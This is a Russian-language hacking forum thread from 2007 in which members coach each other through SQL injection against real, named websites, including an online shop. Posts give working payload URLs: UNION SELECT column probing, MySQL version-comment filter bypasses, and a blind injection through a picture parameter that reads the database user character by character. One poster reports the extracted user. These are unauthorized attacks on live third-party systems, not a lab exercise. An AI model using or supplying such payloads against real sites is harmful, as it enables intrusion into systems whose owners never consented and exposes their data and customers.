sql ХЕЛП

Discussion in 'Уязвимости' started by rubik-nerubik, 21 Oct 2007.

  1. rubik-nerubik

    rubik-nerubik Elder - Старейшина

    Joined:
    4 May 2007
    Messages:
    248
    Likes Received:
    9
    Reputations:
    -2
    Вообщем случайно ткнул и нашел баг, как обычно кавычкой

    теперь вопрос как реализовать, я подставил одну кавыку мне ругалось типа как прально надо и показало друго продуктИД и я постоянно подставлял всё новый и новый ид с кавычкой, пока вообще не исчезла одна строка, теперь вопрос выдает это:

    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' union select 1,2/*' at line 1 SQL query : select photoID, filesname, thumbnail, enlarged from SS_product_pictures where productID=5656\' union select 1,2/*
    может кто подскажет как бороться? я в растеренности. как видим это шоп
     
  2. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Значение обрамленно кавычкой, кавычки фильтруються, для того что бы создать правильный запрос тебе надо обойти фильтрацию что сделать думаю будет очень сложно если вообще возможно.
     
  3. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Хоть бы ссылку дал...
     
  4. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    Какая тут ковычка кэш ? пробуй -1 union select 1/*
     
    1 person likes this.
  5. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Дык вроде не обрамлено:
    Code:
    productID=5656\'
    тут только его кавычка...

    2rubik-nerubik просто не ставь кавычку и раскручивай скулю...

    после = в запросе поставь:
    Code:
    -5656 union select 1,2,3,4/*
    как я понял, в select там 4 поля
     
  6. rubik-nerubik

    rubik-nerubik Elder - Старейшина

    Joined:
    4 May 2007
    Messages:
    248
    Likes Received:
    9
    Reputations:
    -2
    без кавычки никак т.е. пробывал всё, ерроры выскакивают только с ней может есть алтернатива?

    количество столбцов неизвестно
     
  7. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    суди о выводу ошибки. столбцов 4. давай сюда разберемся. если там mag quotes или addslashes и в запроск обрамление в "" то прийдетсо сложно =)
    давай сюда
     
  8. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    дык зачем тебе ерроры... сделай как я сказал и ищи на странице цифры 1,2,3 или 4 если нет этих цифр возможно это blind -inj вобщем без реального линка сложно тебе че нить сказать
     
  9. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    ссылку в студию, вполне возможно что кэш прав, и составить новый запрос можно только закрыв предидущий кавычкой
     
  10. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    гема прав посмотрел только начало ошибки. Смутила последнияя кавычка, а она еррор просто обрамляет.
     
  11. EST a1ien

    EST a1ien Elder - Старейшина

    Joined:
    2 Apr 2006
    Messages:
    249
    Likes Received:
    48
    Reputations:
    16
    Народ благо не создавать новых тем помогите со скулем
    http://www.lesprom.ru/html/error.php3?e404'/*
    Немогу подобрать колонки может стото не так делаю( может просто mysql версии < 4.0

    вот такой запрос непрокатывает( надоело поля подбирать да и неверю что их так много)
    А вот тут
    http://www.lesprom.ru/members/azlist.php3?sort=clist&order=fullname/*
    с ордером проблема помогите хотябы поля подобрать.
     
    #11 EST a1ien, 23 Oct 2007
    Last edited: 23 Oct 2007
  12. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190

    мускул действительно 3x в нем union select не катит
    да и пробелы фильтруются

    Code:
    http://www.lesprom.ru/html/error.php3?e404'/*!30000asas/*


    тут у меня не получилось провести инъекцию, хотя ошибка выдается, мож там фильтрация какая нить...

    а насчет:
    я вобще не понял о чем ты
     
    #12 Scipio, 23 Oct 2007
    Last edited: 23 Oct 2007
  13. rubik-nerubik

    rubik-nerubik Elder - Старейшина

    Joined:
    4 May 2007
    Messages:
    248
    Likes Received:
    9
    Reputations:
    -2
    http://www.cddj.ru/index.php?productID=-6915+union+select+1,2,3,4/*
    вот сайт, я давал кешу и блекберу, они развели руками или чем там )
    кстати, кеш автор множества статей по скулю =\
     
  14. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    вобщем там mysql 4.1 user()[email protected]

    Это все делается через подзапросы, но в другом параметре:
    Code:
    http://www.cddj.ru/index.php?productID=1312&picture_id=1420%20and%20substring(user(),25,1)=2/*
    вобщем если выражение верное, то загружаются сразу много картинок, в противном случае картинки незагружаются...
    версия 4.1 используй подзапросы
     
  15. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    в этом параметре да =)
    на полный аудит сайта я не не подписывался =)
     
  16. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Когда вас корректно посылают вы не понимаете?